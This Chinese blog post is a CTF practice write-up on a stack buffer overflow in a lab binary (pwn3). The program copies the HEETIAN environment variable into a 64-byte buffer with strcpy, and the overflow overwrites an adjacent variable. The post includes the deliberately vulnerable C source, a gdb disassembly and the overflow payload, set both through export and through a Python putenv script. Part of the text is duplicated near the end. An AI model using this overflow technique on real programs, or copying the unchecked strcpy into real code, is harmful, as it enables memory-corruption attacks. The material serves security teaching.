CTF PWN练习之环境变量继承

已于 2024-01-11 17:31:15 修改
阅读量324 收藏
点赞数
文章标签: linux 服务器 运维 网络 安全
于 2023-08-29 17:32:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yy17111342926/article/details/132566653
版权

今天的实验和上次学习的精确覆盖变量数据有关,CTF
PWN练习中的环境变量继承。这个题目有联系到环境变量参数,我们需要知道在Linux/Windows操作系统中,
每个进程都有其各自的环境变量设置。缺省情况下, 当一个进程被创建时,除了创建过程中的明确更改外,它继承了其父进程的绝大部分环境变量信息。

C语言main函数可以传递三个参数,除了argc和argv参数外,还能接受一个char**类型的envp参数。envp指向一个字符串数组,该数组存储了当前进程具体的环境变量的内容,envp的最后一个元素指向NULL,此为envp结束的标识符。

实验介绍开始

打印环境变量参数信息的示例代码(位于/home/test/3目录下的env.c):

#include <stdio.h>

int main(int argc, char** argv, char** envp)

{

int i = 0;

while (envp[i])

{

printf(“envp[%2d] = %s\n”, i, envp[i]);

i += 1;

}

return 0;

}

编译这段代码生成env程序,然后在命令行下执行,可以看到程序打印出了具体的环境变量参数信息:

图片1.png

环境变量的格式为: 环境变量名=环境变量值

当父进程启动一个子进程时,子进程会继承父进程的换了变量信息。在Linux
Shell下,通过export可以给Shell添加一个环境变量,此后通过Shell启动的子进程都会拥有这个环境变量。

在Shell中执行export testenv="Hello_World"之后,再执行./env,可以看到新的环境变量已经被子进程继承了。

图片2.png

除了通过export添加环境变量以外,我们还可以通过函数getenv、putenv、setenv等对环境变量进行操作。

看完基础知识之后,我们开始来做题,本文实验题目:[《pwn练习之环境变量》](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014110409142200001&pk_campaign=freebuf-
wemedia)。

同样的先看题目描述
主机/home/test/3目录下有一个pwn3程序,这个程序会对进程中名为HEETIAN的环境变量的值进行处理,通过构造特定的环境变量参数数据可以对程序发起溢出攻击,成功会提示
Congratulations, you pwned it. ,失败则会提示 Please try again.
的提示信息。注意:如果没有设置HEETIAN这个环境变量,那么运行程序后将输出 Please set the HEETIAN environment
variable,之后程序自动退出。

请对pwn3程序进行逆向分析和调试,找到程序内部的漏洞,并构造特殊的环境变量参数数据,使之输出成功的提示信息。

题目的考点就是需要我们构造特定的环境变量参数来对程序进行溢出攻击,但是我们溢出也是有条件的,分析一下。

先来看源码,使用cd /home/test/3切换到程序所在目录,执行cat pwn3.c即可看到源代码:

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

int main**( int argc ,** char****** argv**)**

{

int modified;

char buffer[64];

char* variable;

variable = getenv(“HEETIAN”); // 获取环境变量HEETIAN的值

if (variable == NULL)

{

printf(“Please set the HEETIAN environment variable\n”);

exit(1);

}

modified = 0;

strcpy(buffer, variable); // 调用strcpy进行字符串复制,可引发缓冲区溢出

if (modified == 0x0d0a0d0a) // 判断modified的值是否为0x0d0a0d0a

{

printf(“Congratulations, you pwned it.\n”);

}

else

{

printf(“Please try again, you got 0x%08X\n”, modified);

}

return 0;

}

程序首先通过getenv函数获取名为HEETIAN的环境变量参数,然后使用strcpy函数将其值复制到buffer缓冲区中,我们知道这样可以引发缓冲区溢出。

这里当设置超长的环境变量参数数据时,将会产生缓冲区溢出,数据覆盖buffer后会继续覆盖modified变量。

这只是c语言代码,我们就需要用gdb来进行调试来判断溢出的长度。执行gdb
pwn3即可开始通过gdb对pwn3进行调试,现在我们需要阅读main函数的汇编代码,在gdb中执行disas
main命令即可,下面是对main函数中的汇编代码的解释(无关代码已经省略):

(gdb) disas main

Dump of assembler code for function main:

0x0804848d <+9>: movl $0x80485d4,(%esp)

; 调用getenv获取环境变量HEETIAN的值

0x08048494 <+16>: call 0x8048364 getenv@plt

; 将结果保存到variable变量,即[esp+0x5c]

0x08048499 <+21>: mov %eax,0x5c(%esp)

; 判断返回结果是否为NULL

0x0804849d <+25>: cmpl $0x0,0x5c(%esp)

0x080484a2 <+30>: jne 0x80484bc <main+56>

; 初始化modified变量的值为0,位于[esp+0x58]

0x080484bc <+56>: movl $0x0,0x58(%esp)

; 调用strcpy对buffer进行填充,位于[esp+0x18]

0x080484c4 <+64>: mov 0x5c(%esp),%eax

0x080484c8 <+68>: mov %eax,0x4(%esp)

0x080484cc <+72>: lea 0x18(%esp),%eax

0x080484d0 <+76>: mov %eax,(%esp)

0x080484d3 <+79>: call 0x8048384 strcpy@plt

; 判断modified变量的值是否为0x0d0a0d0a

0x080484d8 <+84>: cmpl $0xd0a0d0a,0x58(%esp)

End of assembler dump.

通过对上面的汇编代码进行分析,我们知道buffer位于esp+0x18处,而modified位于esp+0x58处,两个地址的距离为0x58 - 0x18

0x40,即64,刚好为buffer数组的大小。因此当环境变量HEETIAN的值的数据超过64字节时,modified变量就可以被覆盖,但需要控制modified变量的值还需要小心的构造数据。我们只要合理控制环境变量参数的第65~68字节的内容,就可以成功发起溢出攻击了。

我们输入64个a加上’\x0a\x0d\x0a\x0d’就可以了吗?

当然不是,之前说到了环境变量,需要构造环境变量然后再来输入。

因为目标机器采用小端格式存储数据,而if语句分支要求modified的值为0x0d0a0d0a时才通过判断,因此我们构造的数据应该为\x0a\x0d\x0a\x0d。

要是感觉连续输入64个a比较麻烦,这里有两种更简便的办法1.通过export修改环境变量前面已经介绍过通过export可以修改环境变量,执行下面的语句:

export HEETIAN=$(python -c “print
‘A’*64+‘\x0a\x0d\x0a\x0d’”)然后运行./pwn3就可以看到攻击效果了,如图所示:

图片3.png

接下来,我们来看通过python脚本动态修改环境变量。

在/home/test/3下存在一个pwn3.py的python脚本,执行cat pwn3.py可以看到源码:

import os

def pwn():

os.putenv(“HEETIAN”, “A”*64+“\x0a\x0d\x0a\x0d”)

os.system(“./pwn3”)

if name == “main”:

pwn()

为了排除前面的环境变量的干扰,我们先修改HEETIAN的的值为AAA,然后再执行python脚本,可以看到攻击效果,如图所示:

图片4.png

pwn3.py先修改HEETIAN环境变量的值,然后通过system启动pwn3程序。

.system(“./pwn3”)

if name == “main”:

pwn()

为了排除前面的环境变量的干扰,我们先修改HEETIAN的的值为AAA,然后再执行python脚本,可以看到攻击效果,如图所示:

[外链图片转存中…(img-SPZibq0E-1693301495674)]

pwn3.py先修改HEETIAN环境变量的值,然后通过system启动pwn3程序。

如果你对网络安全感兴趣,学习资源免费分享,保证100%免费!!!(嘿客入门教程)

👉网安(嘿客)全套学习视频👈

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

img

img

👉网安(嘿客红蓝对抗)所有方向的学习路线****👈

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

img

学习资料工具包

压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

在这里插入图片描述
面试题资料

独家渠道收集京东、360、天融信等公司测试题!进大厂指日可待!
在这里插入图片描述

👉嘿客必备开发工具👈

工欲善其事必先利其器。学习客常用的开发软件都在这里了,给大家节省了很多时间。

这份完整版的网络安全(客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】

在这里插入图片描述

如果你有需要可以点击👉CSDN大礼包:《嘿客&网络安全入门&进阶学习资源包》免费分享

程序员柚柚
关注
CTF系统环境打造
Darenfy 随记
01-08 1254
想要在做题过程中打造一个属于自己的 CTF 系统环境 分类记录 前言 主机环境 MBP Pro 2019 15.6 虚拟机 Kali 2019.04 (默认) 安装必要工具包 apt update Misc Stegsolver wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar chmod +x stegsolve.jar mv stegsolve.jar /usr/bin/ 需要时直接运行即可 Crypto A
CTF-PWN练习环境变量继承
ChuMeng1999的博客
01-04 906
目录预备知识一、相关实验二、环境变量参数三、Python基础知识四、Shell基础知识实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF-PWN练习》以及《CTF-PWN练习之精确覆盖变量数据》。 二、环境变量参数 在Linux/Windows操作系统中,每个进程都有其各自的环境变量设置。缺省情况下,当一个进程被创建时,除了创建过程中的明确更改外,它继承了其父进程的绝大部分环境变量信息。 扩展的C语言main
CTF(Capture The Flag )环境搭建
怡红群芳的博客
03-24 3219
CTFd是目前最流行的开源CTF框架之一,是一个有Python开发的框架,侧重于易用性和可定制性。它提供了运行CTF题目所需要的一切条件,并可使用插件和主题轻松进行自定义。
ctf攻防靶场环境+题目源码+解题过程(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-24 477
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
用Mellivora搭建CTF靶场环境
风不归的乐园
04-03 6845
所用系统:Ubuntu20.04 (记得先给虚拟机联网嗷~NAT模式) 正式步骤: 1、在应用中找到软件和更新,转换站点,这里选用最佳站点,反正就是出问题可以尝试换源,确定后关闭软件与更新弹窗时会有一个新的弹窗,选择重新载入便可,载入成功后弹窗会自动关闭 2、打开终端: 1)切换到root用户: sudo su 2)更新软件源中所有软件列表: apt-get update 3)更新软件: apt-get upgrade 4)安装curl: apt install cu
网络安全从零开始学习CTF——CTF基本概念_ctf竞赛编程环境是什么
code8889的博客
04-16 784
一般大型比赛大都是i春秋承办的,以小组的形式比赛,分预选赛和总决赛。
CTF靶场系列结——综合环境
m0re's blog
08-19 1933
文章目录前言一、综合环境——低难度二、综合环境——较高难度1.引入库2.读入数据总结 前言 这次就是靶场系列的最后一篇了,这段时间学习这个系列的知识,感觉确实学到很多东西。现在做一下总结吧。 一、综合环境——低难度 tip:emmm,与之前重复的内容这里就不再提了,主要记录下思路。 使用nikto和dirb等工具探测过后,发现了以下敏感页 login.php index.php config.php 其中login.php是个登录页面。没有信息,先查看源码(其实我先尝试了弱口令,但是没有成功,还是乖乖
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1543
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF-PWN练习之通用跳转技术
ChuMeng1999的博客
01-06 2303
目录预备知识一、相关实验二、strdup函数三、grep命令实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之绕过返回地址限制》。 二、strdup函数 strdup可以用于复制一个字符串,我们通常使用字符串时会使用strcpy,这要求已经定义好了一个接收缓冲区。而strdup只接受一个参数,也就是要复制的字符串的地址,strdup()会先用malloc()配置与参数字符串相同大小的的空间,然后
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境 0x00 前言 CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。 0x01 搭建环境 使用CTFhub中的环境的前提条件需要在本地搭建docker的环境。 Ubuntu安装Docker如下: 支持版本 Ubuntu Precise 12.04 (LTS) Ubuntu Trusty 14.04 (LTS) Ubuntu Wily 15.10 以上版本之后的所有版本 内核高于3.10 1.获取安装最新版本的Docker wget -qO- https://get.docker.com/ | sh 或者 apt-get update && apt-get install docker.io 2.启动Docker服务 service docker start 3.安装co
使用docker复现CTF环境
weixin_45887311的博客
04-02 1060
使用docker复现CTF环境 docker环境的安装我也是看网上的教程,有很多自行百度。记录一些关于docker复现环境使用的一些操作。 一些docker的配置 刚刚安装好docker的需要开启服务 service docker start 再将docker服务设置为开机自启 systemctl enable docker.service 安装docker-compos...
CTF之web学习记录 -- 环境和工具篇
lifanxin的博客
05-03 2408
工具篇引言本地web环境搭建安装apache安装PHP 引言   作为一名刚入坑二进制不久的新人选手,发现ctf的道路任重而道远,恍惚间又看到一些关于二进制求生之路上的劝退语录,于是为了提升综合素养,开始学习web方向。这里是我从零到一的学习记录,写博客的好处一来是夯实基础,巩固复习,二来是分享经验,希望新入坑的读者可以少走弯路。 本地web环境搭建 安装apache   这里介绍Ubuntu下apache环境的搭建以及一些常用的终端操作命令。 # 安装apache2 sudo apt install ap
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1029
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
从零开始部署CTF题目环境(docker容器)
yuwoxinanA3的博客
12-29 2247
CTF容器题目搭建全过程
CTF实验环境搭建与工具安装记录
记事本
04-10 1032
由于系统总是偶然出问题,记录此文以便快速恢复环境。 基本环境 设置密码 $ sudo passwd root $ sudo passwd 用户名 更换源为清华源 or else 系统更新 $ apt update $ apt fullupgrade $ apt autoremove $ apt autoclean 配置SSH $ apt install openssh-server $ /etc/init.d/ssh start 支持32位 $ dpkg --add-archite
CTF环境搭建记录
qq_40490088的博客
07-30 2530
软件安装 VMware Workstation 14 Virtual Box 网上下载了一个封装的靶场镜像,用virtual box打开 “管理” - > “导入虚拟电脑” 在文件目录中选择对应的虚拟靶机镜像 需要勾选重新初始化所有网卡的MAC地址,再选择导入 导入后配置网络连接方式为桥接网卡 之前选择桥接网卡时,无法使用桥接方式,即"界面名称"为"未指定",...
从0-1的CTF比赛环境搭建过程
weixin_62257805的博客
08-17 3113
博主已经对CTFd v3.3.1官方源码进行了更换国内镜像源、添加CTFd-Whale子模块、配置frp网络、设置静态文件CDN加速等工作,可前往使用作者修改的版本进行安装部署。使用Xshll连接进行操作(根据个人习惯选择)此次仅记录了搭建成功的大概过程,也是再N次失败后的一次小小复盘,其中有很多过程在不同机器和系统版本中可能出现报错,其解决方法自行百度或科学上网查找。有时间会更新本地虚拟机详细搭建过程。............
pwn 环境变量继承
08-13
Linux中,当父进程启动一个子进程时,子进程会继承父进程的环境变量信息。这意味着子进程会拥有与父进程相同的环境变量参数。在Shell中,可以通过export命令给Shell添加一个环境变量,此后通过Shell启动的子进程都会拥有这个环境变量。除了通过export添加环境变量,还可以使用函数getenv、putenv、setenv等对环境变量进行操作。在Python中,可以使用os模块的相应函数来创建子进程和修改环境变量参数。os.system函数可以创建一个子进程,且子进程会继承父进程的环境变量参数信息;os.putenv可以修改进程的环境变量参数信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTF-PWN练习环境变量继承](https://blog.csdn.net/ChuMeng1999/article/details/122302920)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值